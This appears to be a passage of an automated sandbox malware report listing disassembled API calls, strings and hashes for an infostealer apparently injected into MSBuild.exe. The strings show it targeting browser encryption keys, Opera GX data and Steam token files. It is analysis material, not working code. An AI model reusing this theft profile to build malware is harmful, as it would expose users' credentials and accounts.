                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: __aulldiv.LIBCMT ref: 6C8836E4
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C88309F
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B85
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: EnterCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B90
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: LeaveCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5BD8
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: GetTickCount64.KERNEL32 ref: 6C8A5BE4
                                                                                                                                                                                                                      • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C8830BE
                                                                                                                                                                                                                        • Part of subcall function 6C8830F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C883127
                                                                                                                                                                                                                        • Part of subcall function 6C8830F0: __aulldiv.LIBCMT ref: 6C883140
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB2A: __onexit.LIBCMT ref: 6C8BAB30
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4291168024-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4203777966-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                                                                        • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                                                                      • String ID: Opera GX
                                                                                                                                                                                                                      • API String ID: 1719890681-3280151751
                                                                                                                                                                                                                      • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                                                                                                                      • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-3916222277
                                                                                                                                                                                                                      • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                                                                                                                      • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                      • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                      • API String ID: 502913869-3507145866
                                                                                                                                                                                                                      • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                                                                                                                      • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                                                                      • String ID: 1iA
                                                                                                                                                                                                                      • API String ID: 3494564517-1863120733
                                                                                                                                                                                                                      • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                                                                                                                      • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                      • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                                                                                      • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 0041CBC9
                                                                                                                                                                                                                        • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                                                                                                                                        • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                                                                                                                                        • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 0041CC06
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2974738957-0
                                                                                                                                                                                                                      • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                                                                                                                      • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                                                                                                                      • Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                                                                                                                      • Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1699248803-0
                                                                                                                                                                                                                      • Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                                                                                                                      • Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                                                                                                                      • Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHFileOperationA.SHELL32(?), ref: 00412577
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileOperation
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3080627654-0
                                                                                                                                                                                                                      • Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                                                                                                                                                      • Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2803490479-0
                                                                                                                                                                                                                      • Opcode ID: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                                                                                                                      • Instruction ID: f25db29369a0cc3c2a63bcf2525b0a85751bd4b2dcebbf23d4fd8c8c2b96b222
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3021F6742007148FC320DF6ED485996B7F1FF49324B18886EEA8A8B722C776E881CB55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2803490479-0
                                                                                                                                                                                                                      • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                                                                                      • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C896CCC
                                                                                                                                                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C896D11
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(0000000C), ref: 6C896D26
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C896D35
                                                                                                                                                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C896D53
                                                                                                                                                                                                                      • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C896D73
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C896D80
                                                                                                                                                                                                                      • CertGetNameStringW.CRYPT32 ref: 6C896DC0
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6C896DDC
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C896DEB
                                                                                                                                                                                                                      • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C896DFF
                                                                                                                                                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C896E10
                                                                                                                                                                                                                      • CryptMsgClose.CRYPT32(00000000), ref: 6C896E27
                                                                                                                                                                                                                      • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C896E34
                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 6C896EF9
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6C896F7D
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C896F8C
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C89709D
                                                                                                                                                                                                                      • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C897103
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C897153
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C897176
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C897209
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89723A
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89726B
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89729C
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8972DC
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89730D
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C8973C2
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8973F3
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8973FF
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C897406
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C89740D
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C89741A
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C89755A
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C897568
                                                                                                                                                                                                                      • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C897585
                                                                                                                                                                                                                      • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C897598
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8975AC
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                              • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                      • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                      • Opcode ID: c74df5f83aedf661a255440b92eb50f9d7688dbd2e0f7eafd4cb301ebbc88955
                                                                                                                                                                                                                      • Instruction ID: 912e3b86540c071155e6b785887e6752f079b78e422bcbb4c9b4034b65532055
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c74df5f83aedf661a255440b92eb50f9d7688dbd2e0f7eafd4cb301ebbc88955
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6052A5B1A042149FEB31DF68CD44BEA77B8FB45708F1049ADE90997640DB70AB84CF91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8CF09B
